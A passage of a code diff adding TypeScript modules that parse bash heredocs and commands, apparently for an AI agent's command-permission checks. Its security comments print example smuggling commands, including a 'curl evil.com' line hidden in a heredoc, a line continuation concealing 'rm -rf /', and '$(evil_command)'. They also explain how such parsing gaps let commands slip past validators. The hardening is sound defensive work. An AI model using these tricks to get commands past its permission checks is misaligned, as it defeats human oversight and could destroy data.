// (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF").
|
||||
// IMPORTANT: Only match bash's actual metacharacters — space (0x20),
|
||||
// tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which
|
||||
// also matches \r, \f, \v, and Unicode whitespace that bash treats as
|
||||
// regular word characters, not terminators.
|
||||
if (operatorEndIndex < command.length) {
|
||||
const nextChar = command[operatorEndIndex]!
|
||||
if (!/^[ \t\n|&;()<>]$/.test(nextChar)) {
|
||||
continue
|
||||
}
|
||||
}
|
||||
|
||||
// In bash, heredoc content starts on the NEXT LINE after the operator.
|
||||
// Any content on the same line after <<EOF (like " && echo done") is part
|
||||
// of the command, not the heredoc content.
|
||||
//
|
||||
// SECURITY: The "same line" must be the LOGICAL command line, not the
|
||||
// first physical newline. Multi-line quoted strings extend the logical
|
||||
// line — bash waits for the quote to close before starting to read the
|
||||
// heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE
|
||||
// quoted strings, causing the body to start too early.
|
||||
//
|
||||
// Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF`
|
||||
// - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg)
|
||||
// - Bash: waits for `'` to close → logical line is
|
||||
// `echo <<'EOF' '${}\n' ; curl evil.com` → heredoc body = `EOF`
|
||||
// - Our old code: indexOf('\n') finds the quoted newline → body starts
|
||||
// at `' ; curl evil.com\nEOF` → curl swallowed into placeholder →
|
||||
// NEVER reaches permission checks.
|
||||
//
|
||||
// Fix: scan forward from operatorEndIndex using quote-state tracking,
|
||||
// finding the first newline that's NOT inside a quoted string. Same
|
||||
// quote-tracking semantics as advanceScan (already used to validate
|
||||
// the `<<` operator position above).
|
||||
let firstNewlineOffset = -1
|
||||
{
|
||||
let inSingleQuote = false
|
||||
let inDoubleQuote = false
|
||||
// We start with clean quote state — advanceScan already rejected the
|
||||
// case where the `<<` operator itself is inside a quote.
|
||||
for (let k = operatorEndIndex; k < command.length; k++) {
|
||||
const ch = command[k]
|
||||
if (inSingleQuote) {
|
||||
if (ch === "'") inSingleQuote = false
|
||||
continue
|
||||
}
|
||||
if (inDoubleQuote) {
|
||||
if (ch === '\\') {
|
||||
k++ // skip escaped char inside double quotes
|
||||
continue
|
||||
}
|
||||
if (ch === '"') inDoubleQuote = false
|
||||
continue
|
||||
}
|
||||
// Unquoted context
|
||||
if (ch === '\n') {
|
||||
firstNewlineOffset = k - operatorEndIndex
|
||||
break
|
||||
}
|
||||
// Count backslashes for escape detection in unquoted context
|
||||
let backslashCount = 0
|
||||
for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) {
|
||||
backslashCount++
|
||||
}
|
||||
if (backslashCount % 2 === 1) continue // escaped char
|
||||
if (ch === "'") inSingleQuote = true
|
||||
else if (ch === '"') inDoubleQuote = true
|
||||
}
|
||||
// If we ended while still inside a quote, the logical line never ends —
|
||||
// there is no heredoc body. Leave firstNewlineOffset as -1 (handled below).
|
||||
}
|
||||
|
||||
// If no unquoted newline found, this heredoc has no content - skip it
|
||||
if (firstNewlineOffset === -1) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Check for backslash-newline continuation at the end of the
|
||||
// same-line content (text between the operator and the newline). In bash,
|
||||
// `\<newline>` joins lines BEFORE heredoc parsing — so:
|
||||
// cat <<'EOF' && \
|
||||
// rm -rf /
|
||||
// content
|
||||
// EOF
|
||||
// bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line),
|
||||
// then heredoc body = `content`. Our extractor runs BEFORE continuation
|
||||
// joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body,
|
||||
// hiding it from all validators. Bail if same-line content ends with an
|
||||
// odd number of backslashes.
|
||||
const sameLineContent = command.slice(
|
||||
operatorEndIndex,
|
||||
operatorEndIndex + firstNewlineOffset,
|
||||
)
|
||||
let trailingBackslashes = 0
|
||||
for (let j = sameLineContent.length - 1; j >= 0; j--) {
|
||||
if (sameLineContent[j] === '\\') {
|
||||
trailingBackslashes++
|
||||
} else {
|
||||
break
|
||||
}
|
||||
}
|
||||
if (trailingBackslashes % 2 === 1) {
|
||||
// Odd number of trailing backslashes → last one escapes the newline
|
||||
// → this is a line continuation. Our heredoc-before-continuation order
|
||||
// would misparse this. Bail out.
|
||||
continue
|
||||
}
|
||||
|
||||
const contentStartIndex = operatorEndIndex + firstNewlineOffset
|
||||
const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself
|
||||
const contentLines = afterNewline.split('\n')
|
||||
|
||||
// Find the closing delimiter - must be on its own line
|
||||
// Security: Must match bash's exact behavior to prevent parsing discrepancies
|
||||
// that could allow command smuggling past permission checks.
|
||||
let closingLineIndex = -1
|
||||
for (let i = 0; i < contentLines.length; i++) {
|
||||
const line = contentLines[i]!
|
||||
|
||||
if (isDash) {
|
||||
// <<- strips leading TABS only (not spaces), per POSIX/bash spec.
|
||||
// The line after stripping leading tabs must be exactly the delimiter.
|
||||
const stripped = line.replace(/^\t*/, '')
|
||||
if (stripped === delimiter) {
|
||||
closingLineIndex = i
|
||||
break
|
||||
}
|
||||
} else {
|
||||
// << requires the closing delimiter to be exactly alone on the line
|
||||
// with NO leading or trailing whitespace. This matches bash behavior.
|
||||
if (line === delimiter) {
|
||||
closingLineIndex = i
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606).
|
||||
// Inside $(), ${}, or backtick substitution, bash closes a heredoc when
|
||||
// a line STARTS with the delimiter and contains the shell_eof_token
|
||||
// (`)`, `}`, or backtick) anywhere after it. Our parser only does exact
|
||||
// line matching, so this discrepancy could hide smuggled commands.
|
||||
//
|
||||
// Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <,
|
||||
// >) after the delimiter, which could indicate command syntax from a
|
||||
// parsing discrepancy we haven't identified.
|
||||
//
|
||||
// For <<- heredocs, bash strips leading tabs before this check.
|
||||
const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line
|
||||
if (
|
||||
eofCheckLine.length > delimiter.length &&
|
||||
eofCheckLine.startsWith(delimiter)
|
||||
) {
|
||||
const charAfterDelimiter = eofCheckLine[delimiter.length]!
|
||||
if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) {
|
||||
// Shell metacharacter or substitution closer after delimiter —
|
||||
// bash may close the heredoc early here. Bail out.
|
||||
closingLineIndex = -1
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Security: If quotedOnly mode is set and this is an unquoted heredoc,
|
||||
// record its content range for nesting checks but do NOT add it to
|
||||
// heredocMatches. This ensures quoted "heredocs" inside its body are
|
||||
// correctly rejected by the insideSkipped check on subsequent iterations.
|
||||
//
|
||||
// CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the
|
||||
// unquoted heredoc has no closing delimiter, bash still treats everything
|
||||
// to end-of-input as the heredoc body (and expands $() within it). We
|
||||
// must block extraction of any subsequent quoted "heredoc" that falls
|
||||
// inside that unbounded body.
|
||||
if (options?.quotedOnly && !isQuotedOrEscaped) {
|
||||
let skipContentEndIndex: number
|
||||
if (closingLineIndex === -1) {
|
||||
// No closing delimiter — in bash, heredoc body extends to end of
|
||||
// input. Track the entire remaining range as "skipped body".
|
||||
skipContentEndIndex = command.length
|
||||
} else {
|
||||
const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
|
||||
const skipContentLength = skipLinesUpToClosing.join('\n').length
|
||||
skipContentEndIndex = contentStartIndex + 1 + skipContentLength
|
||||
}
|
||||
skippedHeredocRanges.push({
|
||||
contentStartIndex,
|
||||
contentEndIndex: skipContentEndIndex,
|
||||
})
|
||||
continue
|
||||
}
|
||||
|
||||
// If no closing delimiter found, this is malformed - skip it
|
||||
if (closingLineIndex === -1) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Calculate end position: contentStartIndex + 1 (newline) + length of lines up to and including closing delimiter
|
||||
const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
|
||||
const contentLength = linesUpToClosing.join('\n').length
|
||||
const contentEndIndex = contentStartIndex + 1 + contentLength
|
||||
|
||||
// Security: Bail if this heredoc's content range OVERLAPS with any
|
||||
// previously-skipped heredoc's content range. This catches the case where
|
||||
// two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first
|
||||
// is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs
|
||||
// share a line, their bodies appear SEQUENTIALLY (first's body, then
|
||||
// second's). Both compute contentStartIndex from the SAME newline, so the
|
||||
// second's body search walks through the first's body. For:
|
||||
// cat <<EOF <<'SAFE'
|
||||
// $(evil_command)
|
||||
// EOF
|
||||
// safe body
|
||||
// SAFE
|
||||
// ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body,
|
||||
// swallowing `$(evil_command)` (which bash EXECUTES via the unquoted
|
||||
// <<EOF's expansion) into the placeholder, hiding it from validators.
|
||||
//
|
||||
// The insideSkipped check above doesn't catch this because the quoted
|
||||
// operator's startIndex is on the command line BEFORE contentStart.
|
||||
// The contentStartPositions dedup check below doesn't catch it because the
|
||||
// skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs.
|
||||
let overlapsSkipped = false
|
||||
for (const skipped of skippedHeredocRanges) {
|
||||
// Ranges [a,b) and [c,d) overlap iff a < d && c < b
|
||||
if (
|
||||
contentStartIndex < skipped.contentEndIndex &&
|
||||
skipped.contentStartIndex < contentEndIndex
|
||||
) {
|
||||
overlapsSkipped = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if (overlapsSkipped) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Build fullText: operator + newline + content (normalized form for restoration)
|
||||
// This creates a clean heredoc that can be restored correctly
|
||||
const operatorText = command.slice(startIndex, operatorEndIndex)
|
||||
const contentText = command.slice(contentStartIndex, contentEndIndex)
|
||||
const fullText = operatorText + contentText
|
||||
|
||||
heredocMatches.push({
|
||||
fullText,
|
||||
delimiter,
|
||||
operatorStartIndex: startIndex,
|
||||
operatorEndIndex,
|
||||
contentStartIndex,
|
||||
contentEndIndex,
|
||||
})
|
||||
}
|
||||
|
||||
// If no valid heredocs found, return original
|
||||
if (heredocMatches.length === 0) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Filter out nested heredocs - any heredoc whose operator starts inside
|
||||
// another heredoc's content range should be excluded.
|
||||
// This prevents corruption when heredoc content contains << patterns.
|
||||
const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => {
|
||||
// Check if this candidate's operator is inside any other heredoc's content
|
||||
for (const other of all) {
|
||||
if (candidate === other) continue
|
||||
// Check if candidate's operator starts within other's content range
|
||||
if (
|
||||
candidate.operatorStartIndex > other.contentStartIndex &&
|
||||
candidate.operatorStartIndex < other.contentEndIndex
|
||||
) {
|
||||
// This heredoc is nested inside another - filter it out
|
||||
return false
|
||||
}
|
||||
}
|
||||
return true
|
||||
})
|
||||
|
||||
// If filtering removed all heredocs, return original
|
||||
if (topLevelHeredocs.length === 0) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Check for multiple heredocs sharing the same content start position
|
||||
// (i.e., on the same line). This causes index corruption during replacement
|
||||
// because indices are calculated on the original string but applied to
|
||||
// a progressively modified string. Return without extraction - the fallback
|
||||
// is safe (requires manual approval or fails parsing).
|
||||
const contentStartPositions = new Set(
|
||||
topLevelHeredocs.map(h => h.contentStartIndex),
|
||||
)
|
||||
if (contentStartPositions.size < topLevelHeredocs.length) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Sort by content end position descending so we can replace from end to start
|
||||
// (this preserves indices for earlier replacements)
|
||||
topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex)
|
||||
|
||||
// Generate a unique salt for this extraction to prevent placeholder collisions
|
||||
// with literal "__HEREDOC_N__" text in commands
|
||||
const salt = generatePlaceholderSalt()
|
||||
|
||||
let processedCommand = command
|
||||
topLevelHeredocs.forEach((info, index) => {
|
||||
// Use reverse index since we sorted descending
|
||||
const placeholderIndex = topLevelHeredocs.length - 1 - index
|
||||
const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}`
|
||||
|
||||
heredocs.set(placeholder, info)
|
||||
|
||||
// Replace heredoc with placeholder while preserving same-line content:
|
||||
// - Keep everything before the operator
|
||||
// - Replace operator with placeholder
|
||||
// - Keep content between operator and heredoc content (e.g., " && echo done")
|
||||
// - Remove the heredoc content (from newline through closing delimiter)
|
||||
// - Keep everything after the closing delimiter
|
||||
processedCommand =
|
||||
processedCommand.slice(0, info.operatorStartIndex) +
|
||||
placeholder +
|
||||
processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) +
|
||||
processedCommand.slice(info.contentEndIndex)
|
||||
})
|
||||
|
||||
return { processedCommand, heredocs }
|
||||
}
|
||||
|
||||
/**
|
||||
* Restores heredoc placeholders back to their original content in a single string.
|
||||
* Internal helper used by restoreHeredocs.
|
||||
*/
|
||||
function restoreHeredocsInString(
|
||||
text: string,
|
||||
heredocs: Map<string, HeredocInfo>,
|
||||
): string {
|
||||
let result = text
|
||||
for (const [placeholder, info] of heredocs) {
|
||||
result = result.replaceAll(placeholder, info.fullText)
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
/**
|
||||
* Restores heredoc placeholders in an array of strings.
|
||||
*
|
||||
* @param parts - Array of strings that may contain heredoc placeholders
|
||||
* @param heredocs - The map of placeholders from `extractHeredocs`
|
||||
* @returns New array with placeholders replaced by original heredoc content
|
||||
*/
|
||||
export function restoreHeredocs(
|
||||
parts: string[],
|
||||
heredocs: Map<string, HeredocInfo>,
|
||||
): string[] {
|
||||
if (heredocs.size === 0) {
|
||||
return parts
|
||||
}
|
||||
|
||||
return parts.map(part => restoreHeredocsInString(part, heredocs))
|
||||
}
|
||||
|
||||
/**
|
||||
* Checks if a command contains heredoc syntax.
|
||||
*
|
||||
* This is a quick check that doesn't validate the heredoc is well-formed,
|
||||
* just that the pattern exists.
|
||||
*
|
||||
* @param command - The shell command string
|
||||
* @returns true if the command appears to contain heredoc syntax
|
||||
*/
|
||||
export function containsHeredoc(command: string): boolean {
|
||||
return HEREDOC_START_PATTERN.test(command)
|
||||
}
|
||||
@@ -0,0 +1,230 @@
|
||||
import { feature } from 'bun:bundle'
|
||||
import { logEvent } from '../../services/analytics/index.js'
|
||||
import { logForDebugging } from '../debug.js'
|
||||
import {
|
||||
ensureParserInitialized,
|
||||
getParserModule,
|
||||
type TsNode,
|
||||
} from './bashParser.js'
|
||||
|
||||
export type Node = TsNode
|
||||
|
||||
export interface ParsedCommandData {
|
||||
rootNode: Node
|
||||
envVars: string[]
|
||||
commandNode: Node | null
|
||||
originalCommand: string
|
||||
}
|
||||
|
||||
const MAX_COMMAND_LENGTH = 10000
|
||||
const DECLARATION_COMMANDS = new Set([
|
||||
'export',
|
||||
'declare',
|
||||
'typeset',
|
||||
'readonly',
|
||||
'local',
|
||||
'unset',
|
||||
'unsetenv',
|
||||
])
|
||||
const ARGUMENT_TYPES = new Set(['word', 'string', 'raw_string', 'number'])
|
||||
const SUBSTITUTION_TYPES = new Set([
|
||||
'command_substitution',
|
||||
'process_substitution',
|
||||
])
|
||||
const COMMAND_TYPES = new Set(['command', 'declaration_command'])
|
||||
|
||||
let logged = false
|
||||
function logLoadOnce(success: boolean): void {
|
||||
if (logged) return
|
||||
logged = true
|
||||
logForDebugging(
|
||||
success ? 'tree-sitter: native module loaded' : 'tree-sitter: unavailable',
|
||||
)
|
||||
logEvent('tengu_tree_sitter_load', { success })
|
||||
}
|
||||
|
||||
/**
|
||||
* Awaits WASM init (Parser.init + Language.load). Must be called before
|
||||
* parseCommand/parseCommandRaw for the parser to be available. Idempotent.
|
||||
*/
|
||||
export async function ensureInitialized(): Promise<void> {
|
||||
if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
|
||||
await ensureParserInitialized()
|
||||
}
|
||||
}
|
||||
|
||||
export async function parseCommand(
|
||||
command: string,
|
||||
): Promise<ParsedCommandData | null> {
|
||||
if (!command || command.length > MAX_COMMAND_LENGTH) return null
|
||||
|
||||
// Gate: ant-only until pentest. External builds fall back to legacy
|
||||
// regex/shell-quote path. Guarding the whole body inside the positive
|
||||
// branch lets Bun DCE the NAPI import AND keeps telemetry honest — we
|
||||
// only fire tengu_tree_sitter_load when a load was genuinely attempted.
|
||||
if (feature('TREE_SITTER_BASH')) {
|
||||
await ensureParserInitialized()
|
||||
const mod = getParserModule()
|
||||
logLoadOnce(mod !== null)
|
||||
if (!mod) return null
|
||||
|
||||
try {
|
||||
const rootNode = mod.parse(command)
|
||||
if (!rootNode) return null
|
||||
|
||||
const commandNode = findCommandNode(rootNode, null)
|
||||
const envVars = extractEnvVars(commandNode)
|
||||
|
||||
return { rootNode, envVars, commandNode, originalCommand: command }
|
||||
} catch {
|
||||
return null
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
|
||||
/**
|
||||
* SECURITY: Sentinel for "parser was loaded and attempted, but aborted"
|
||||
* (timeout / node budget / Rust panic). Distinct from `null` (module not
|
||||
* loaded). Adversarial input can trigger abort under MAX_COMMAND_LENGTH:
|
||||
* `(( a[0][0]... ))` with ~2800 subscripts hits PARSE_TIMEOUT_MICROS.
|
||||
* Callers MUST treat this as fail-closed (too-complex), NOT route to legacy.
|
||||
*/
|
||||
export const PARSE_ABORTED = Symbol('parse-aborted')
|
||||
|
||||
/**
|
||||
* Raw parse — skips findCommandNode/extractEnvVars which the security
|
||||
* walker in ast.ts doesn't use. Saves one tree walk per bash command.
|
||||
*
|
||||
* Returns:
|
||||
* - Node: parse succeeded
|
||||
* - null: module not loaded / feature off / empty / over-length
|
||||
* - PARSE_ABORTED: module loaded but parse failed (timeout/panic)
|
||||
*/
|
||||
export async function parseCommandRaw(
|
||||
command: string,
|
||||
): Promise<Node | null | typeof PARSE_ABORTED> {
|
||||
if (!command || command.length > MAX_COMMAND_LENGTH) return null
|
||||
if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
|
||||
await ensureParserInitialized()
|
||||
const mod = getParserModule()
|
||||
logLoadOnce(mod !== null)
|
||||
if (!mod) return null
|
||||
try {
|
||||
const result = mod.parse(command)
|
||||
// SECURITY: Module loaded; null here = timeout/node-budget abort in
|
||||
// bashParser.ts (PARSE_TIMEOUT_MS=50, MAX_NODES=50_000).
|
||||
// Previously collapsed into `return null` → parse-unavailable → legacy
|
||||
// path, which lacks EVAL_LIKE_BUILTINS — `trap`, `enable`, `hash` leaked.
|
||||
if (result === null) {
|
||||
logEvent('tengu_tree_sitter_parse_abort', {
|
||||
cmdLength: command.length,
|
||||
panic: false,
|
||||
})
|
||||
return PARSE_ABORTED
|
||||
}
|
||||
return result
|
||||
} catch {
|
||||
logEvent('tengu_tree_sitter_parse_abort', {
|
||||
cmdLength: command.length,
|
||||
panic: true,
|
||||
})
|
||||
return PARSE_ABORTED
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
|
||||
function findCommandNode(node: Node, parent: Node | null): Node | null {
|
||||
const { type, children } = node
|
||||
|
||||
if (COMMAND_TYPES.has(type)) return node
|
||||
|
||||
// Variable assignment followed by command
|
||||
if (type === 'variable_assignment' && parent) {
|
||||
return (
|
||||
parent.children.find(
|
||||
c => COMMAND_TYPES.has(c.type) && c.startIndex > node.startIndex,
|
||||
) ?? null
|
||||
)
|
||||
}
|
||||
|
||||
// Pipeline: recurse into first child (which may be a redirected_statement)
|
||||
if (type === 'pipeline') {
|
||||
for (const child of children) {
|
||||
const result = findCommandNode(child, node)
|
||||
if (result) return result
|
||||
}
|
||||
return null
|
||||
}
|
||||
|
||||
// Redirected statement: find the command inside
|
||||
if (type === 'redirected_statement') {
|
||||
return children.find(c => COMMAND_TYPES.has(c.type)) ?? null
|
||||
}
|
||||
|
||||
// Recursive search
|
||||
for (const child of children) {
|
||||
const result = findCommandNode(child, node)
|
||||
if (result) return result
|
||||
}
|
||||
|
||||
return null
|
||||
}
|
||||
|
||||
function extractEnvVars(commandNode: Node | null): string[] {
|
||||
if (!commandNode || commandNode.type !== 'command') return []
|
||||
|
||||
const envVars: string[] = []
|
||||
for (const child of commandNode.children) {
|
||||
if (child.type === 'variable_assignment') {
|
||||
envVars.push(child.text)
|
||||
} else if (child.type === 'command_name' || child.type === 'word') {
|
||||
break
|
||||
}
|
||||
}
|
||||
return envVars
|
||||
}
|
||||
|
||||
export function extractCommandArguments(commandNode: Node): string[] {
|
||||
// Declaration commands
|
||||
if (commandNode.type === 'declaration_command') {
|
||||
const firstChild = commandNode.children[0]
|
||||
return firstChild && DECLARATION_COMMANDS.has(firstChild.text)
|
||||
? [firstChild.text]
|
||||
: []
|
||||
}
|
||||
|
||||
const args: string[] = []
|
||||
let foundCommandName = false
|
||||
|
||||
for (const child of commandNode.children) {
|
||||
if (child.type === 'variable_assignment') continue
|
||||
|
||||
// Command name
|
||||
if (
|
||||
child.type === 'command_name' ||
|
||||
(!foundCommandName && child.type === 'word')
|
||||
) {
|
||||
foundCommandName = true
|
||||
args.push(child.text)
|
||||
continue
|
||||
}
|
||||
|
||||
// Arguments
|
||||
if (ARGUMENT_TYPES.has(child.type)) {
|
||||
args.push(stripQuotes(child.text))
|
||||
} else if (SUBSTITUTION_TYPES.has(child.type)) {
|
||||
break
|
||||
}
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
||||
function stripQuotes(text: string): string {
|
||||
return text.length >= 2 &&
|
||||
((text[0] === '"' && text.at(-1) === '"') ||
|
||||
(text[0] === "'" && text.at(-1) === "'"))
|
||||
? text.slice(1, -1)
|
||||
: text
|
||||
}
|
||||
@@ -0,0 +1,204 @@
|
||||
import { buildPrefix } from '../shell/specPrefix.js'
|
||||
import { splitCommand_DEPRECATED } from './commands.js'
|
||||
import { extractCommandArguments, parseCommand } from './parser.js'
|
||||
import { getCommandSpec } from './registry.js'
|
||||
|
||||
const NUMERIC = /^\d+$/
|
||||
const ENV_VAR = /^[A-Za-z_][A-Za-z0-9_]*=/
|
||||
|
||||
// Wrapper commands with complex option handling that can't be expressed in specs
|
||||
const WRAPPER_COMMANDS = new Set([
|
||||
'nice', // command position varies based on options
|
||||
])
|
||||
|
||||
const toArray = <T>(val: T | T[]): T[] => (Array.isArray(val) ? val : [val])
|
||||
|
||||
// Check if args[0] matches a known subcommand (disambiguates wrapper commands
|
||||
// that also have subcommands, e.g. the git spec has isCommand args for aliases).
|
||||
function isKnownSubcommand(
|
||||
arg: string,
|
||||
spec: { subcommands?: { name: string | string[] }[] } | null,
|
||||
): boolean {
|
||||
if (!spec?.subcommands?.length) return false
|
||||
return spec.subcommands.some(sub =>
|
||||
Array.isArray(sub.name) ? sub.name.includes(arg) : sub.name === arg,
|
||||
)
|
||||
}
|
||||
|
||||
export async function getCommandPrefixStatic(
|
||||
command: string,
|
||||
recursionDepth = 0,
|
||||
wrapperCount = 0,
|
||||
): Promise<{ commandPrefix: string | null } | null> {
|
||||
if (wrapperCount > 2 || recursionDepth > 10) return null
|
||||
|
||||
const parsed = await parseCommand(command)
|
||||
if (!parsed) return null
|
||||
if (!parsed.commandNode) {
|
||||
return { commandPrefix: null }
|
||||
}
|
||||
|
||||
const { envVars, commandNode } = parsed
|
||||
const cmdArgs = extractCommandArguments(commandNode)
|
||||
|
||||
const [cmd, ...args] = cmdArgs
|
||||
if (!cmd) return { commandPrefix: null }
|
||||
|
||||
// Check if this is a wrapper command by looking at its spec
|
||||
const spec = await getCommandSpec(cmd)
|
||||
// Check if this is a wrapper command
|
||||
let isWrapper =
|
||||
WRAPPER_COMMANDS.has(cmd) ||
|
||||
(spec?.args && toArray(spec.args).some(arg => arg?.isCommand))
|
||||
|
||||
// Special case: if the command has subcommands and the first arg matches a subcommand,
|
||||
// treat it as a regular command, not a wrapper
|
||||
if (isWrapper && args[0] && isKnownSubcommand(args[0], spec)) {
|
||||
isWrapper = false
|
||||
}
|
||||
|
||||
const prefix = isWrapper
|
||||
? await handleWrapper(cmd, args, recursionDepth, wrapperCount)
|
||||
: await buildPrefix(cmd, args, spec)
|
||||
|
||||
if (prefix === null && recursionDepth === 0 && isWrapper) {
|
||||
return null
|
||||
}
|
||||
|
||||
const envPrefix = envVars.length ? `${envVars.join(' ')} ` : ''
|
||||
return { commandPrefix: prefix ? envPrefix + prefix : null }
|
||||
}
|
||||
|
||||
async function handleWrapper(
|
||||
command: string,
|
||||
args: string[],
|
||||
recursionDepth: number,
|
||||
wrapperCount: number,
|
||||
): Promise<string | null> {
|
||||
const spec = await getCommandSpec(command)
|
||||
|
||||
if (spec?.args) {
|
||||
const commandArgIndex = toArray(spec.args).findIndex(arg => arg?.isCommand)
|
||||
|
||||
if (commandArgIndex !== -1) {
|
||||
const parts = [command]
|
||||
|
||||
for (let i = 0; i < args.length && i <= commandArgIndex; i++) {
|
||||
if (i === commandArgIndex) {
|
||||
const result = await getCommandPrefixStatic(
|
||||
args.slice(i).join(' '),
|
||||
recursionDepth + 1,
|
||||
wrapperCount + 1,
|
||||
)
|
||||
if (result?.commandPrefix) {
|
||||
parts.push(...result.commandPrefix.split(' '))
|
||||
return parts.join(' ')
|
||||
}
|
||||
break
|
||||
} else if (
|
||||
args[i] &&
|
||||
!args[i]!.startsWith('-') &&
|
||||
!ENV_VAR.test(args[i]!)
|
||||
) {
|
||||
parts.push(args[i]!)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
const wrapped = args.find(
|
||||
arg => !arg.startsWith('-') && !NUMERIC.test(arg) && !ENV_VAR.test(arg),
|
||||
)
|
||||
if (!wrapped) return command
|
||||
|
||||
const result = await getCommandPrefixStatic(
|
||||
args.slice(args.indexOf(wrapped)).join(' '),
|
||||
recursionDepth + 1,
|
||||
wrapperCount + 1,
|
||||
)
|
||||
|
||||
return !result?.commandPrefix ? null : `${command} ${result.commandPrefix}`
|
||||
}
|
||||
|
||||
/**
|
||||
* Computes prefixes for a compound command (with && / || / ;).
|
||||
* For single commands, returns a single-element array with the prefix.
|
||||
*
|
||||
* For compound commands, computes per-subcommand prefixes and collapses
|
||||
* them: subcommands sharing a root (first word) are collapsed via
|
||||
* word-aligned longest common prefix.
|
||||
*
|
||||
* @param excludeSubcommand — optional filter; return true for subcommands
|
||||
* that should be excluded from the prefix suggestion (e.g. read-only
|
||||
* commands that are already auto-allowed).
|
||||
*/
|
||||
export async function getCompoundCommandPrefixesStatic(
|
||||
command: string,
|
||||
excludeSubcommand?: (subcommand: string) => boolean,
|
||||
): Promise<string[]> {
|
||||
const subcommands = splitCommand_DEPRECATED(command)
|
||||
if (subcommands.length <= 1) {
|
||||
const result = await getCommandPrefixStatic(command)
|
||||
return result?.commandPrefix ? [result.commandPrefix] : []
|
||||
}
|
||||
|
||||
const prefixes: string[] = []
|
||||
for (const subcmd of subcommands) {
|
||||
const trimmed = subcmd.trim()
|
||||
if (excludeSubcommand?.(trimmed)) continue
|
||||
const result = await getCommandPrefixStatic(trimmed)
|
||||
if (result?.commandPrefix) {
|
||||
prefixes.push(result.commandPrefix)
|
||||
}
|
||||
}
|
||||
|
||||
if (prefixes.length === 0) return []
|
||||
|
||||
// Group prefixes by their first word (root command)
|
||||
const groups = new Map<string, string[]>()
|
||||
for (const prefix of prefixes) {
|
||||
const root = prefix.split(' ')[0]!
|
||||
const group = groups.get(root)
|
||||
if (group) {
|
||||
group.push(prefix)
|
||||
} else {
|
||||
groups.set(root, [prefix])
|
||||
}
|
||||
}
|
||||
|
||||
// Collapse each group via word-aligned LCP
|
||||
const collapsed: string[] = []
|
||||
for (const [, group] of groups) {
|
||||
collapsed.push(longestCommonPrefix(group))
|
||||
}
|
||||
return collapsed
|
||||
}
|
||||
|
||||
/**
|
||||
* Compute the longest common prefix of strings, aligned to word boundaries.
|
||||
* e.g. ["git fetch", "git worktree"] → "git"
|
||||
* ["npm run test", "npm run lint"] → "npm run"
|
||||
*/
|
||||
function longestCommonPrefix(strings: string[]): string {
|
||||
if (strings.length === 0) return ''
|
||||
if (strings.length === 1) return strings[0]!
|
||||
|
||||
const first = strings[0]!
|
||||
const words = first.split(' ')
|
||||
let commonWords = words.length
|
||||
|
||||
for (let i = 1; i < strings.length; i++) {
|
||||
const otherWords = strings[i]!.split(' ')
|
||||
let shared = 0
|
||||
while (
|
||||
shared < commonWords &&
|
||||
shared < otherWords.length &&
|
||||
words[shared] === otherWords[shared]
|
||||
) {
|
||||
shared++
|
||||
}
|
||||
commonWords = shared
|
||||
}
|
||||
|
||||
return words.slice(0, Math.max(1, commonWords)).join(' ')
|
||||
}
|
||||
@@ -0,0 +1,53 @@
|
||||
import { memoizeWithLRU } from '../memoize.js'
|
||||
import specs from './specs/index.js'
|
||||
|
||||
export type CommandSpec = {
|
||||
name: string
|
||||
description?: string
|
||||
subcommands?: CommandSpec[]
|
||||
args?: Argument | Argument[]
|
||||
options?: Option[]
|
||||
}
|
||||
|
||||
export type Argument = {
|
||||
name?: string
|
||||
description?: string
|
||||
isDangerous?: boolean
|
||||
isVariadic?: boolean // repeats infinitely e.g. echo hello world
|
||||
isOptional?: boolean
|
||||
isCommand?: boolean // wrapper commands e.g. timeout, sudo
|
||||
isModule?: string | boolean // for python -m and similar module args
|
||||
isScript?: boolean // script files e.g. node script.js
|
||||
}
|
||||
|
||||
export type Option = {
|
||||
name: string | string[]
|
||||
description?: string
|
||||
args?: Argument | Argument[]
|
||||
isRequired?: boolean
|
||||
}
|
||||
|
||||
export async function loadFigSpec(
|
||||
command: string,
|
||||
): Promise<CommandSpec | null> {
|
||||
